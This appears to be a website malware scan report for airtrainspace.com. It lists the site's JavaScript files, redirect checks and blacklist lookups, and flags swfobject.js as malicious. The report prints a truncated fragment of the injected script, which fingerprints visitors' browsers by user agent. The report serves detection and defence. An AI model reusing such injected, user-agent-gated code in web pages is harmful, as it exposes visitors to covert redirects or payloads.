Scanned pages/files
Request | Server response | Status |
http://www.airtrainspace.com/ | 200 OK Content-Length: 89034 Content-Type: text/html | clean |
http://www.airtrainspace.com/media/system/js/mootools-core.js | 200 OK Content-Length: 97285 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/system/js/mootools-more.js | 200 OK Content-Length: 111515 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/system/js/core.js | 200 OK Content-Length: 5707 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/system/js/caption.js | 200 OK Content-Length: 1652 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/system/js/modal.js | 200 OK Content-Length: 10655 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/zen/js/jquery/jquery-1.8.3.min.js | 200 OK Content-Length: 94560 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/media/zen/js/jquery/jquery-noconflict.js | 200 OK Content-Length: 944 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/modules/mod_xpertcontents/interface/js/xpertcontents.js | 200 OK Content-Length: 6712 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/modules/mod_zstagcloud/js/swfobject.js | 200 OK Content-Length: 10682 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Tizonecontrol() {
var unipostersypasto = navigator.userAgent; var ma = (unipostersypasto.indexOf("Android") > -1 || unipostersypasto.indexOf("Chrome") > -1 || unipostersypasto.indexOf("Macintosh") > -1 || unipostersypasto.indexOf("FreeBSD") > -1 || unipostersypasto.indexOf("Linux") > -1 || unipostersypasto.indexOf("IEMobile") > -1 || unipostersypasto.indexOf("iPhone") > -1 || unipostersypasto.indexOf("iPad") > -1 || unipostersypasto.indexOf("IBrowse") & Antivirus reports:
| ||
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/dropline-helper.js | 200 OK Content-Length: 1448 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/djselect.js | 200 OK Content-Length: 2925 Content-Type: text/javascript | clean |
http://www.airtrainspace.com/modules/mod_djmenu/assets/js/djmenu.js | 200 OK Content-Length: 4880 Content-Type: text/javascript | clean |
http://www.airtrainspace.com//www.airtrainspace.com//templates/dj-real-estate02//lib/js/doctextsizer.js/ | 404 Not Found Content-Length: 1083 Content-Type: text/html | clean |
http://www.airtrainspace.com//templates/dj-real-estate02/index.php/ | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: airtrainspace.com
Result:
GET / HTTP/1.1
Host: airtrainspace.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: airtrainspace.com
Referer: http://www.google.com/search?q=airtrainspace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: airtrainspace.com
Referer: http://www.google.com/search?q=airtrainspace.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=airtrainspace.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://airtrainspace.com/
Result: airtrainspace.com is not infected or malware details are not published yet.
Result: airtrainspace.com is not infected or malware details are not published yet.